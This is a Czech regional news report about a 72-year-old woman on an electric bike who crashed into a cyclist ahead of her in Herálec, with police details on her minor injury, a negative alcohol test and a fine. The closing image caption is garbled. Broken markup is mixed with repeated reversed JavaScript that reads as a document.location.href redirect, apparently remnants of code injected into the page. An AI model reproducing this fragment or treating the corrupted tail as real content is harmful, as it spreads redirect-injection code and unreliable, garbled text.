Rainbow page separator

Seniorka na elektrokole narazila do cyklisty jedoucím před ní

Středa, 9. června 2021

Herálec / Lehké zranění si vyžádal střet dvou cyklistů v Herálci, k němuž došlo v pátek 4. června kolem půl sedmé ráno. Dvaasedmdesátiletá cyklistka na elektrokole projížděla od nákupního centra ke kostelu, přičemž nedodržela dostatečnou bezpečnosti od cyklisty, který jel ve stejném směru před ní, a narazila do něj. Po střetu žena upadla na vozovku.
„Cyklistka při dopravní nehodě utrpěla lehké zranění, pro které byla z místa převezena vozidlem zdravotnické záchranné služby do nemocnice. Ke zranění jiných osob nedošlo. U cyklistky policisté provedli dechovou zkoušku na alkohol s negativním výsledkem,“ informovala policejní mluvčí Dana Čírtková. Doplnila, že při kolizi vznikla hmotná škoda na jízdních kolech v celkové výši pět tisíc korun a přivolaní policisté vyřešili dopravní nehodu na místě uložením pokuty v příkazním řízení.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-300×138.jpg“ alt=“Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny“ width=“300″ height=“138″ />